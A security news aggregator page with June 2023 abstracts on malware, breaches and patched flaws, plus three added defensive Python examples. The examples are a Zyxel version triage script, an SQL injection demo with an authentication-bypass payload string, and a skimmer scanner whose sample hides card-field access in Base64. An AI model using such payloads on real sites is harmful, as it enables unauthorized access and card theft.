Abstract Apple’s Safari browser is getting an improved Private Browsing mode, which will lock when not in use, so that users can leave tabs open even if they need to step away from the device.

Cyware

June 06, 2023 – Malware

New Malware Campaign Leveraging Satacom Downloader to Steal Cryptocurrency Full Text

Abstract A recent malware campaign has been found to leverage Satacom downloader as a conduit to deploy stealthy malware capable of siphoning cryptocurrency using a rogue extension for Chromium-based browsers. "The main purpose of the malware that is dropped by the Satacom downloader is to steal BTC from the victim's account by performing web injections into targeted cryptocurrency websites," Kaspersky researchers Haim Zigel and Oleg Kupreev said. Targets of the campaign include Coinbase, Bybit, KuCoin, Huobi, and Binance users primarily located in Brazil, Algeria, Turkey, Vietnam, Indonesia, India, Egypt, and Mexico. Satacom downloader, also called Legion Loader, first emerged in 2019 as a dropper for next-stage payloads, including information stealers and cryptocurrency miners. Infection chains involving the malware begin when users searching for cracked software are redirected to bogus websites that host ZIP archive files containing the malware. "Various types

The Hacker News

June 6, 2023 – Vulnerabilities

NASA website flaw jeopardizes astrobiology fans Full Text

Abstract A flaw in a NASA website dedicated to astrobiology could have tricked users into visiting malicious websites by disguising a dangerous URL with NASA's name. Space travel is undoubtedly dangerous. And, apparently, so is visiting NASA's legitimate...

Security Affairs

June 6, 2023 – Attack

Update: Augusta not in contact with ransomware group behind attack, mayor says Full Text

Abstract In a statement on Friday, the office of Augusta Mayor Garnett Johnson said it has continued to work with the city’s IT team and outside security specialists to address the cyberattack that started on May 21.

Cyware

June 06, 2023 – Phishing

Over 60K Adware Apps Posing as Cracked Versions of Popular Apps Target Android Devices Full Text

Abstract Thousands of adware apps for Android have been found to masquerade as cracks or modded versions of popular apps in order to serve unwanted ads to users as part of a campaign ongoing since October 2022. "The campaign is designed to aggressively push adware to Android devices with the purpose to drive revenue," Bitdefender said in a technical report shared with The Hacker News. "However, the threat actors involved can easily switch tactics to redirect users to other types of malware such as banking Trojans to steal credentials and financial information or ransomware." The Romanian cybersecurity company said it has discovered 60,000 unique apps carrying the adware, with a majority of the detections located in the U.S., South Korea, Brazil, Germany, the U.K., France, Kazakhstan, Romania, and Italy. It's worth pointing out that none of the apps are distributed through the official Google Play Store. Instead, users searching for apps like Netflix, PDF

The Hacker News

June 6, 2023 – Breach

Hackers stole around $35 million in Atomic Wallet security breach Full Text

Abstract Threat actors have stolen more than $35 million from the decentralized cryptocurrency wallet platform Atomic Wallet. Atomic Wallet is a multi-currency cryptocurrency wallet that allows users to securely store, manage, and exchange various digital...

Security Affairs

June 6, 2023 – Criminals

Cybercriminals target C-suite, family members with sophisticated attacks Full Text

Abstract Senior corporate executives are increasingly being targeted by sophisticated cyberattacks that target their corporate and home office environments and even extend to family members, according to a study from BlackCloak and Ponemon Institute.

Cyware

June 06, 2023 – Education

5 Reasons Why IT Security Tools Don’t Work For OT Full Text

Abstract Attacks on critical infrastructure and other OT systems are on the rise as digital transformation and OT/IT convergence continue to accelerate. Water treatment facilities, energy providers, factories, and chemical plants — the infrastructure that undergirds our daily lives could all be at risk. Disrupting or manipulating OT systems stands to pose real physical harm to citizens, environments, and economies. Yet the landscape of OT security tools is far less developed than its information technology (IT) counterpart. According to a recent report from Takepoint Research and Cyolo, there is a notable lack of confidence in the tools commonly used to secure remote access to industrial environments. Figure 1: New research reveals a large gap across industries between the level of concern about security risks and the level of confidence in existing solutions for industrial secure remote access (I-SRA). The traditional security strategy of industrial environments was isolation – isolatio

The Hacker News

June 6, 2023 – Vulnerabilities

Google fixed the third Chrome zero-day of 2023 Full Text

Abstract Google released security updates to address a high-severity zero-day flaw in the Chrome web browser that is being actively exploited in the wild. Google released security updates to address a high-severity vulnerability, tracked as CVE-2023-3079, in its Chrome...

Security Affairs

June 6, 2023 – General

Verizon 2023 DBIR: Human Error Involved in Many Breaches, Ransomware Cost Surges Full Text

Abstract Ransomware accounted for 24% of cybersecurity incidents analyzed by Verizon. The company saw the number of ransomware attacks being higher in the past two years than in the previous five years combined.

Cyware

June 06, 2023 – Vulnerabilities

Zero-Day Alert: Google Issues Patch for New Chrome Vulnerability - Update Now! Full Text

Abstract Google on Monday released security updates to patch a high-severity flaw in its Chrome web browser that it said is being actively exploited in the wild. Tracked as CVE-2023-3079, the vulnerability has been described as a type confusion bug in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on June 1, 2023. "Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page," according to the NIST's National Vulnerability Database (NVD). The tech giant, as is typically the case, did not disclose details of the nature of the attacks, but noted it's "aware that an exploit for CVE-2023-3079 exists in the wild." With the latest development, Google has addressed a total of three actively exploited zero-days in Chrome since the start of the year - CVE-2023-2033 (CVSS score: 8.8) - Type Co

The Hacker News

June 6, 2023 – Criminals

Cyclops Ransomware group offers a multiplatform Info Stealer Full Text

Abstract Researchers from security firm Uptycs reported that threat actors linked to the Cyclops ransomware are offering a Go-based information stealer. The Cyclops group has developed multi-platform ransomware that can infect Windows, Linux, and macOS...

Security Affairs

June 6, 2023 – Cryptocurrency

Impulse Team Ran Years-Long Mostly-Undetected Cryptocurrency Scam Full Text

Abstract The scam works via advance-fee fraud, tricking victims into believing they've won cryptocurrency rewards but requiring them to pay a small activation fee to access their rewards.

Cyware

June 06, 2023 – Ransomware

Cyclops Ransomware Gang Offers Go-Based Info Stealer to Cybercriminals Full Text

Abstract Threat actors associated with the Cyclops ransomware have been observed offering an information stealer malware that's designed to capture sensitive data from infected hosts. "The threat actor behind this [ransomware-as-a-service] promotes its offering on forums," Uptycs said in a new report. "There it requests a share of profits from those engaging in malicious activities using its malware." Cyclops ransomware is notable for targeting all major desktop operating systems, including Windows, macOS, and Linux. It's also designed to terminate any potential processes that could interfere with encryption. The macOS and Linux versions of Cyclops ransomware are written in Golang. The ransomware further employs a complex encryption scheme that's a mix of asymmetric and symmetric encryption. The Go-based stealer, for its part, is designed to target Windows and Linux systems, capturing details such as operating system information, computer name, number o

The Hacker News

June 6, 2023 – Breach

British Airways, BBC and Boots were impacted by the Zellis data breach Full Text

Abstract The BBC and British Airways were both impacted by the data breach suffered by the payroll provider Zellis. As a result of the cyber attack on the payroll provider Zellis, the personal data of employees at the BBC and British Airways has been compromised...

Security Affairs

June 6, 2023 – Government

NATO: Military cyber defenders need to be present on networks during peacetime Full Text

Abstract David van Weel, NATO’s assistant secretary general for emerging security challenges, told the 15th annual International Conference on Cyber Conflict (CyCon) that NATO members will begin recognizing cyberspace as “a permanently contested environment.”

Cyware

June 06, 2023 – Phishing

Chinese PostalFurious Gang Strikes UAE Users with Sneaky SMS Phishing Scheme Full Text

Abstract A Chinese-speaking phishing gang dubbed PostalFurious has been linked to a new SMS campaign that's targeting users in the U.A.E. by masquerading as postal services and toll operators, per Group-IB. The fraudulent scheme entails sending users bogus text messages asking them to pay a vehicle trip fee to avoid additional fines. The messages also contain a shortened URL to conceal the actual phishing link. Clicking on the link directs the unsuspecting recipients to a fake landing page that's designed to capture payment credentials and personal data. The campaign is estimated to be active as of April 15, 2023. "The URLs from the texts lead to fake branded payment pages that ask for personal details, such as name, address, and credit card information," Group-IB said. "The phishing pages appropriate the official name and logo of the impersonated postal service provider." The exact scale of the attacks is currently unknown. What's known is that the tex

The Hacker News

June 06, 2023 – Vulnerabilities

Zyxel Firewalls Under Attack! Urgent Patching Required Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two recently disclosed flaws in Zyxel firewalls to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities, tracked as CVE-2023-33009 and CVE-2023-33010, are buffer overflow vulnerabilities that could enable an unauthenticated attacker to cause a denial-of-service (DoS) condition and remote code execution. Patches to plug the security holes were released by Zyxel on May 24, 2023. The following devices are affected: ATP (versions ZLD V4.32 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2); USG FLEX (versions ZLD V4.50 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2); USG FLEX50(W) / USG20(W)-VPN (versions ZLD V4.25 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2); VPN (versions ZLD V4.30 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2); and ZyWALL/USG (versions ZLD V4.25 to V4.73 Patch 1, patched in ZLD V4.73 Patch 2). While the exa
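The affected-version list above is the kind of thing that gets misread when checked by eye across a fleet, because "V5.36 Patch 1" is affected while "V5.36 Patch 2" is not. The following is an added example (not Zyxel's or CISA's code) that parses ZLD version strings into comparable tuples and triages an inventory against the ranges transcribed from the abstract. The inventory is constructed for the demonstration, and the parser assumes ZLD minor numbers are always two digits, as they are in every version quoted above.

```python
import re

# Affected ranges and the fixed build per product family, transcribed from the
# advisory summary above. Format: (first affected, last affected, first fixed).
AFFECTED = {
    "ATP": ("ZLD V4.32", "ZLD V5.36 Patch 1", "ZLD V5.36 Patch 2"),
    "USG FLEX": ("ZLD V4.50", "ZLD V5.36 Patch 1", "ZLD V5.36 Patch 2"),
    "USG FLEX50(W)/USG20(W)-VPN": ("ZLD V4.25", "ZLD V5.36 Patch 1", "ZLD V5.36 Patch 2"),
    "VPN": ("ZLD V4.30", "ZLD V5.36 Patch 1", "ZLD V5.36 Patch 2"),
    "ZyWALL/USG": ("ZLD V4.25", "ZLD V4.73 Patch 1", "ZLD V4.73 Patch 2"),
}

# Accepts "ZLD V5.36 Patch 1", "V5.36", "5.36 patch 2" and similar spellings.
# Assumption: ZLD minor numbers are two digits, so they compare correctly as ints.
_ZLD_RE = re.compile(r"^(?:ZLD\s*)?V?(\d+)\.(\d+)(?:\s*Patch\s*(\d+))?$", re.IGNORECASE)


def parse_zld(version):
    """Turn a ZLD version string into a comparable (major, minor, patch) tuple."""
    m = _ZLD_RE.match(version.strip())
    if not m:
        raise ValueError("unrecognised ZLD version string: %r" % version)
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(product, version):
    """True when `version` of `product` lies inside the affected range.
    Raises KeyError for a product family the advisory does not list."""
    first, last, _fixed = AFFECTED[product]
    return parse_zld(first) <= parse_zld(version) <= parse_zld(last)


def fixed_version(product):
    return AFFECTED[product][2]


def triage(inventory):
    """inventory: iterable of (hostname, product, version).
    Returns [(hostname, product, version, fixed_version)] for devices still exposed."""
    todo = []
    for host, product, version in inventory:
        if product in AFFECTED and is_vulnerable(product, version):
            todo.append((host, product, version, fixed_version(product)))
    return todo


# Constructed inventory for the demonstration; not real devices.
SAMPLE_INVENTORY = [
    ("fw-branch-01", "ATP", "ZLD V5.36 Patch 1"),
    ("fw-branch-02", "ATP", "ZLD V5.36 Patch 2"),
    ("fw-dc-01", "USG FLEX", "V5.35"),
    ("fw-legacy", "ZyWALL/USG", "V4.73"),
    ("fw-legacy-patched", "ZyWALL/USG", "ZLD V4.73 Patch 2"),
    ("fw-old", "ATP", "V4.20"),
]

if __name__ == "__main__":
    for host, product, version, fix in triage(SAMPLE_INVENTORY):
        print("%s: %s %s is affected, upgrade to %s" % (host, product, version, fix))
```

A device running a build older than the first affected version (the "fw-old" entry) is reported as not in the listed range, not as safe: such firmware is outside what the advisory covers and is usually out of support, so treat it as a separate finding.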

The Hacker News

June 5, 2023 – Breach

Scrubs & Beyond Leaks 400GB of User PII and Card Data in Plain Text Full Text

Abstract The database was exposed on May 16, 2023. Researchers identified the exposure on May 25, 2023, and since then, the information has remained exposed. Currently, the server holds over 100,000 customer records, totaling 400 GB in size.

Cyware

June 05, 2023 – Hacker

Microsoft: Lace Tempest Hackers Behind Active Exploitation of MOVEit Transfer App Full Text

Abstract Microsoft has officially linked the ongoing active exploitation of a critical flaw in the Progress Software MOVEit Transfer application to a threat actor it tracks as Lace Tempest. "Exploitation is often followed by deployment of a web shell with data exfiltration capabilities," the Microsoft Threat Intelligence team said in a series of tweets today. "CVE-2023-34362 allows attackers to authenticate as any user." Lace Tempest, also called Storm-0950, is a ransomware affiliate that overlaps with other groups such as FIN11, TA505, and Evil Corp. It's also known to operate the Cl0p extortion site. The threat actor also has a track record of exploiting different zero-day flaws to siphon data and extort victims, with the group recently observed weaponizing a severe bug in PaperCut servers. CVE-2023-34362 relates to an SQL injection vulnerability in MOVEit Transfer that enables unauthenticated, remote attackers to gain access to the database and execute
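To make concrete how an SQL injection turns into "authenticate as any user", here is an added example of the vulnerability class beside its hardened form. It is not MOVEit Transfer's code and reveals nothing about CVE-2023-34362 itself; the schema, the user rows and the injected string are constructed for the demonstration using Python's built-in sqlite3.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for an application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "user"), ("bob", "user"), ("sysadmin", "admin")])
    return conn


def lookup_user_unsafe(conn, username):
    """Vulnerable pattern: the caller's string is spliced straight into the SQL
    text, so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone()


def lookup_user_safe(conn, username):
    """Hardened form: the value is bound as a parameter and is never parsed as SQL,
    so the same input is looked up literally and matches nobody."""
    return conn.execute("SELECT username, role FROM users WHERE username = ?",
                        (username,)).fetchone()


# Constructed payload: closes the literal, widens the WHERE clause to any admin row,
# and comments out the trailing quote the template appends.
INJECTION = "nobody' OR role = 'admin' --"


def demo():
    """Returns (row from the unsafe lookup, row from the safe lookup) for INJECTION."""
    conn = make_db()
    return lookup_user_unsafe(conn, INJECTION), lookup_user_safe(conn, INJECTION)


if __name__ == "__main__":
    unsafe, safe = demo()
    print("unsafe lookup returned:", unsafe)   # an admin row the caller never named
    print("safe lookup returned:  ", safe)     # None
```

The fix is the bound parameter, not escaping: every layer that assembles SQL from request data (including ORM raw-query escape hatches and stored procedures that concatenate) needs the same treatment, and database accounts used by the web tier should not hold privileges that let a single injected query read or alter every table.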

The Hacker News

June 5, 2023 – Vulnerabilities

KeePass fixed the bug that allows the extraction of the cleartext master password Full Text

Abstract KeePass addressed the CVE-2023-32784 bug that allows the extraction of the cleartext master password from the memory of the client. KeePass has addressed the CVE-2023-32784 vulnerability, which allowed the retrieval of the clear-text master password...

Security Affairs

June 5, 2023 – Vulnerabilities

Gigabyte Rolls Out BIOS Updates to Remove Backdoor From Motherboards Full Text

Abstract The issue, disclosed last week by firmware and hardware security company Eclypsium, is that the firmware of more than 270 Gigabyte motherboards drops a Windows binary that is executed at boot-up to fetch and execute a payload from Gigabyte’s servers.

Cyware

June 05, 2023 – General

The Annual Report: 2024 Plans and Priorities for SaaS Security Full Text

Abstract Over 55% of security executives report that they have experienced a SaaS security incident in the past two years — ranging from data leaks and data breaches to SaaS ransomware and malicious apps (as seen in figures 1 and 2). Figure 1. How many organizations have experienced a SaaS security incident within the past two years The SaaS Security Survey Report: Plans and Priorities for 2024, developed by CSA in conjunction with Adaptive Shield, dives into these SaaS security incidents and more. This report shares the perspective of over 1,000 CISOs and other security professionals and shines a light on SaaS risks, existing threats, and the way organizations are preparing for 2024. Click here to download the full report. SaaS Security Incidents Are on the Rise Anecdotally, it was clear that SaaS security incidents increased over the last year. More headlines and stories covered SaaS breaches and data leaks than ever before. However, this report provides a stunning context to those

The Hacker News

June 5, 2023 – Criminals

Microsoft blames Clop ransomware gang for ‘MOVEit Transfer’ attacks Full Text

Abstract Microsoft attributes the recent campaign exploiting a zero-day in the MOVEit Transfer platform to the Clop ransomware gang. The Clop ransomware gang (aka Lace Tempest) is credited by Microsoft for the recent campaign that exploits a zero-day vulnerability,...

Security Affairs

June 5, 2023 – Attack

Australian cyber-op attacked ISIL with zero-click exploit Full Text

Abstract The documentary, BREAKING the CODE: Cyber Secrets Revealed, reveals that the Australian Signals Directorate developed three payloads it could deploy to ISIL fighters' smartphones and PCs "without ISIL having to interact with the device in any way."

Cyware

June 05, 2023 – Skimming

Magento, WooCommerce, WordPress, and Shopify Exploited in Web Skimmer Attack Full Text

Abstract Cybersecurity researchers have unearthed a new ongoing Magecart-style web skimmer campaign that's designed to steal personally identifiable information (PII) and credit card data from e-commerce websites. A noteworthy aspect that sets it apart from other Magecart campaigns is that the hijacked sites further serve as "makeshift" command-and-control (C2) servers, using the cover to facilitate the distribution of malicious code without the knowledge of the victim sites. Web security company Akamai said it identified victims of varying sizes in North America, Latin America, and Europe, potentially putting the personal data of thousands of site visitors at risk of being harvested and sold for illicit profits. "Attackers employ a number of evasion techniques during the campaign, including obfuscating [using] Base64 and masking the attack to resemble popular third-party services, such as Google Analytics or Google Tag Manager," Akamai security researcher Roman Lv
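The two evasion techniques Akamai names, Base64-obfuscated loaders and scripts dressed up as Google Analytics or Tag Manager, are both visible in the served HTML, which is where a site owner can check for them. The following is an added example (not Akamai's tooling and not the skimmer's code) of a scanner that collects every script element on a checkout page, flags external scripts whose host merely resembles the allowlisted Google hosts, and decodes long Base64 blobs in inline scripts to see whether they reference card-entry fields. The allowlist, the lookalike tokens, the field-name keywords and the sample page (including the fake host gtm-analytics.example and the encoded snippet) are constructed assumptions for the demonstration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only external script hosts this checkout page should load from.
ALLOWED_SCRIPT_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com"}
# Words a skimmer borrows for its hostname or path to blend in with tag managers.
LOOKALIKE_TOKENS = ("google-analytics", "googletagmanager", "gtag", "analytics")
# Field names a decoded skimmer payload tends to reference (assumption; extend per site).
CARD_FIELD_KEYWORDS = ("cardnumber", "card_number", "cc_number", "cvv", "cvc")
# A run of Base64 alphabet long enough to be a payload rather than an id or hash.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


class _ScriptCollector(HTMLParser):
    """Collects (src, inline_body) for every <script> in document order."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def _decoded_mentions_card_fields(blob):
    """Decode a candidate Base64 blob and look for card-field names in the result."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore").lower()
    except Exception:  # not valid Base64 (hash, token, etc.)
        return False
    return any(k in text for k in CARD_FIELD_KEYWORDS)


def scan_html_for_skimmer(html):
    """Return [(finding_type, detail)] for suspicious scripts in the page."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:
            host = (urlparse(src).hostname or "").lower()
            if not host or host in ALLOWED_SCRIPT_HOSTS:
                continue  # same-origin (relative src) or explicitly allowed
            if any(t in host for t in LOOKALIKE_TOKENS):
                findings.append(("lookalike-host", src))
            else:
                findings.append(("unlisted-third-party", src))
        else:
            for blob in B64_BLOB.findall(body):
                if _decoded_mentions_card_fields(blob):
                    findings.append(("inline-b64-card-fields", blob[:16] + "..."))
                    break
    return findings


# Constructed sample page: one real tag host, one first-party script, one unlisted
# CDN, one lookalike host, and an inline loader hiding card-field access in Base64.
_SKIMMER_JS = "document.querySelector('#cardNumber').value+'|'+document.querySelector('#cvv').value"
_B64 = base64.b64encode(_SKIMMER_JS.encode()).decode()
SAMPLE_HTML = """<html><body>
<script src="https://www.googletagmanager.com/gtag/js?id=G-TEST"></script>
<script src="/static/app.js"></script>
<script src="https://cdn.example/vendor.js"></script>
<script src="https://gtm-analytics.example/gtag.js"></script>
<script>var _k="%s";(new Function(atob(_k)))();</script>
<script>console.log("checkout");</script>
</body></html>""" % _B64

if __name__ == "__main__":
    for kind, detail in scan_html_for_skimmer(SAMPLE_HTML):
        print(kind, detail)
```

Run this against the rendered checkout page, not the template in the repository: the campaign above injects into live sites, so the comparison that matters is between what the server actually serves and the script inventory you expect, and a Content-Security-Policy with an explicit script-src allowlist turns the same check into an enforced control rather than an audit.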

The Hacker News

June 5, 2023 – Outage

Idaho Hospitals hit by a cyberattack that impacted their operations Full Text

Abstract Last week two eastern Idaho hospitals and their clinics were hit by a cyberattack that temporarily impacted their operations. Last week the Idaho Falls Community Hospital was hit by a cyber attack that impacted its operations. Officials at the hospital...

Security Affairs

June 5, 2023 – Hacker

Update: Ransomware Group Used MOVEit Exploit to Steal Data From Dozens of Organizations Full Text

Abstract Mandiant has attributed the attack to UNC4857, a new threat cluster, and named the delivered webshell LemurLoot. Microsoft, on the other hand, is confident that the threat actor behind the Cl0p ransomware is responsible for the attack.

Cyware

June 05, 2023 – Criminals

Brazilian Cybercriminals Using LOLBaS and CMD Scripts to Drain Bank Accounts Full Text

Abstract An unknown cybercrime threat actor has been observed targeting Spanish- and Portuguese-speaking victims to compromise online banking accounts in Mexico, Peru, and Portugal. "This threat actor employs tactics such as LOLBaS (living-off-the-land binaries and scripts), along with CMD-based scripts to carry out its malicious activities," the BlackBerry Research and Intelligence Team said in a report published last week. The cybersecurity company attributed the campaign, dubbed Operation CMDStealer, to a Brazilian threat actor based on an analysis of the artifacts. The attack chain primarily leverages social engineering, banking on Portuguese and Spanish emails containing tax- or traffic violation-themed lures to trigger the infections and gain unauthorized access to victims' systems. The emails come fitted with an HTML attachment that contains obfuscated code to fetch the next-stage payload from a remote server in the form of a RAR archive file. The files, which are

The Hacker News

June 5, 2023 – Botnet

Experts warn of a surge of TrueBot activity in May 2023 Full Text

Abstract VMware’s Carbon Black Managed Detection and Response (MDR) team observed a surge of TrueBot activity in May 2023. Researchers at VMware’s Carbon Black Managed Detection and Response (MDR) team warn of a surge of TrueBot activity in May 2023. Truebot...

Security Affairs

June 5, 2023 – Disinformation

A new wave of sophisticated digital fraud hits Europe Full Text

Abstract Forced verification and deepfake cases multiply at alarming rates in the UK and continental Europe, according to Sumsub. In Germany alone, forced verification grew by 1500% as a proportion of all fraud cases to 5% of all fraud in Q1 2023.

Cyware

June 05, 2023 – Botnet

Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors Full Text

Abstract A surge in TrueBot activity was observed in May 2023, cybersecurity researchers disclosed. "TrueBot is a downloader trojan botnet that uses command and control servers to collect information on compromised systems and uses that compromised system as a launching point for further attacks," VMware's Fae Carlisle said. Active since at least 2017, TrueBot is linked to a group known as Silence that's believed to share overlaps with the notorious Russian cybercrime actor known as Evil Corp. Recent TrueBot infections have leveraged a critical flaw in Netwrix Auditor (CVE-2022-31199, CVSS score: 9.8) as well as Raspberry Robin as delivery vectors. The attack chain documented by VMware, on the other hand, starts off with a drive-by download of an executable named "update.exe" from Google Chrome, suggesting that users are lured into downloading the malware under the pretext of a software update. Once run, update.exe establishes connections with a k

The Hacker News

June 5, 2023 – Skimming

Magecart campaign abuses legitimate sites to host web skimmers and act as C2 Full Text

Abstract A new ongoing Magecart web skimmer campaign abuses legitimate websites to act as makeshift command and control (C2) servers. Akamai researchers discovered a new ongoing Magecart web skimmer campaign aimed at stealing personally identifiable information...

Security Affairs

June 5, 2023 – Vulnerabilities

Zyxel published guidance for protecting devices from ongoing attacks Full Text

Abstract Zyxel has published guidance for protecting firewall and VPN devices from ongoing attacks exploiting the CVE-2023-28771, CVE-2023-33009, and CVE-2023-33010 vulnerabilities.

Cyware

June 5, 2023 – Criminals

Spanish bank Globalcaja confirms Play ransomware attack Full Text

Abstract Play ransomware group claims responsibility for a ransomware attack that hit Globalcaja, one of the major banks in Spain. Globalcaja is a financial institution in the autonomous community of Castilla-La Mancha; it has more than 300 offices across...

Security Affairs

June 5, 2023 – Hacker

The Hidden Menace of the Terminator Antivirus Killer Full Text

Abstract A threat actor was discovered promoting a tool called Terminator that can reportedly bypass 24 antivirus, EDR, and XDR solutions. However, CrowdStrike found that it uses a Bring Your Own Vulnerable Driver (BYOVD) attack. Presently, the vulnerable driver used by Terminator is only being identified b ...

Cyware

June 4, 2023 – Ransomware

New BlackSuit Ransomware Exhibits Striking Similarities With Royal Full Text

Abstract Trend Micro examined and uncovered “an extremely high degree of similarity” between the recently surfaced BlackSuit group and the Royal ransomware group. They share approximately 98% similarity in functions, 99.5% similarity in code blocks, and 98.9% similarity in jump instructions, as witnessed on ...

Cyware

June 4, 2023 – General

Security Affairs newsletter Round 422 by Pierluigi Paganini – International edition Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Xplain...

Security Affairs

June 4, 2023 – Attack

Void Rabisu Group Uses RomCom for Geopolitical Attacks Full Text

Abstract Researchers shed light on evolving objectives of the Void Rabisu hacking group as they uncovered a campaign that used a fake version of the Ukrainian army’s Delta situational awareness website to lure targets into installing the RomCom backdoor. While their previous operations were centered on data ...

Cyware

June 4, 2023 – Attack

Xplain hack impacted the Swiss cantonal police and Fedpol Full Text

Abstract Several Swiss cantonal police, the army, customs and the Federal Office of Police (Fedpol) were impacted by the attack against IT firm Xplain. Swiss police launched an investigation into the cyber attack that hit the Bernese IT company...

Security Affairs

June 4, 2023 – Vulnerabilities

Zyxel published guidance for protecting devices from ongoing attacks Full Text

Abstract Zyxel has published guidance for protecting firewall and VPN devices from the recently discovered ongoing attacks exploiting CVE-2023-28771, CVE-2023-33009,...

Security Affairs

June 03, 2023 – Ransomware

New Linux Ransomware Strain BlackSuit Shows Striking Similarities to Royal Full Text

Abstract An analysis of the Linux variant of a new ransomware strain called BlackSuit has uncovered significant similarities with another ransomware family called Royal. Trend Micro, which examined an x64 VMware ESXi version targeting Linux machines, said it identified an "extremely high degree of similarity" between Royal and BlackSuit. "In fact, they're nearly identical, with 98% similarities in functions, 99.5% similarities in blocks, and 98.9% similarities in jumps based on BinDiff, a comparison tool for binary files," Trend Micro researchers noted. A comparison of the Windows artifacts has identified 93.2% similarity in functions, 99.3% in basic blocks, and 98.4% in jumps based on BinDiff. BlackSuit first came to light in early May 2023 when Palo Alto Networks Unit 42 drew attention to its ability to target both Windows and Linux hosts. In line with other ransomware groups, it runs a double extortion scheme that steals and encrypts sensitive data in a c

The Hacker News

June 03, 2023 – General

Cloud Security Tops Concerns for Cybersecurity Leaders: EC-Council’s Certified CISO Hall of Fame Report 2023 Full Text

Abstract A survey of global cybersecurity leaders through the 2023 Certified CISO Hall of Fame Report commissioned by the EC-Council identified 4 primary areas of grave concern: cloud security, data security, security governance, and lack of cybersecurity talent. EC-Council, the global leader in cybersecurity education and training, released its Certified Chief Information Security Officer Hall of Fame Report today, honoring the top 50 Certified CISOs globally. This report reveals that approximately 50% of surveyed information security leaders identified cloud security as their top concern. Findings from the report suggest the top cybersecurity concerns with which organizations struggle and highlight the need for implementing robust security frameworks with skilled cybersecurity professionals to effectively contain emerging threats. On average, an enterprise uses approximately 1,295 cloud services, while an employee uses at least 36 cloud-based services daily. Cloud security risk is real for

The Hacker News

June 3, 2023 – Malware

DogeRAT Malware Eyes Banking and Entertainment Sectors Full Text

Abstract A new Android malware threat was discovered targeting users primarily located in India. Named DogeRAT, the malware is distributed through social media and messaging platforms disguised as Opera Mini, OpenAI ChatGPT, and premium versions of Netflix and YouTube. It can gain unauthorized access to a u ...

Cyware

June 03, 2023 – Policy and Law

FTC Slams Amazon with $30.8M Fine for Privacy Violations Involving Alexa and Ring Full Text

Abstract The U.S. Federal Trade Commission (FTC) has fined Amazon a cumulative $30.8 million over a series of privacy lapses regarding its Alexa assistant and Ring security cameras. This comprises a $25 million penalty for breaching children's privacy laws by retaining their Alexa voice recordings for indefinite time periods and preventing parents from exercising their deletion rights. "Amazon's history of misleading parents, keeping children's recordings indefinitely, and flouting parents' deletion requests violated COPPA and sacrificed privacy for profits," FTC's Samuel Levine said. As part of the court order, the retail giant has been mandated to delete the collected information, including inactive child accounts, geolocation data, and voice recordings, and prohibited from gathering such data to train its algorithms. It's also required to disclose to customers its data retention practices. Amazon has also agreed to fork out an additional $5.8 million

The Hacker News

June 3, 2023 – Attack

Hackers Exploit Barracuda ESG Zero-Day Flaw to Backdoor Malware Full Text

Abstract Barracuda has disclosed information about a recent attack campaign that exploits a zero-day vulnerability in its ESG appliances to deploy three different malware strains. CISA added the flaw to its KEV catalog last week, urging federal agencies to apply the patches by June 16.

Cyware

June 3, 2023 – APT

Kimsuky APT poses as journalists and broadcast writers in its attacks Full Text

Abstract North Korea-linked APT group Kimsuky is posing as journalists to gather intelligence, a joint advisory from NSA and FBI warns. A joint advisory from the FBI, the U.S. Department of State, the National Security Agency (NSA), South Korea’s National...

Security Affairs

June 3, 2023 – Vulnerabilities

Threat actors can exfiltrate data from Google Drive without leaving a trace Full Text

Abstract Google Workspace (formerly G Suite) has a weak spot that can prevent the discovery of data exfiltration from Google Drive by a malicious outsider or insider, Mitiga researchers say.

Cyware

June 3, 2023 – Ransomware

New Linux Ransomware BlackSuit is similar to Royal ransomware Full Text

Abstract Experts noticed that the new Linux ransomware BlackSuit has significant similarities with the Royal ransomware family. Royal ransomware is one of the most notable ransomware families of 2022; it made the headlines in early May 2023 with the attack...

Security Affairs

June 2, 2023 – Vulnerabilities

High-Severity Vulnerabilities Patched in Splunk Enterprise Full Text

Abstract The most severe of the patched flaws is CVE-2023-32707, a privilege escalation issue that allows low-privileged users with the ‘edit_user’ capability to escalate privileges to administrator via a specially crafted web request.

Cyware

June 02, 2023 – Botnet

New Botnet Malware ‘Horabot’ Targets Spanish-Speaking Users in Latin America Full Text

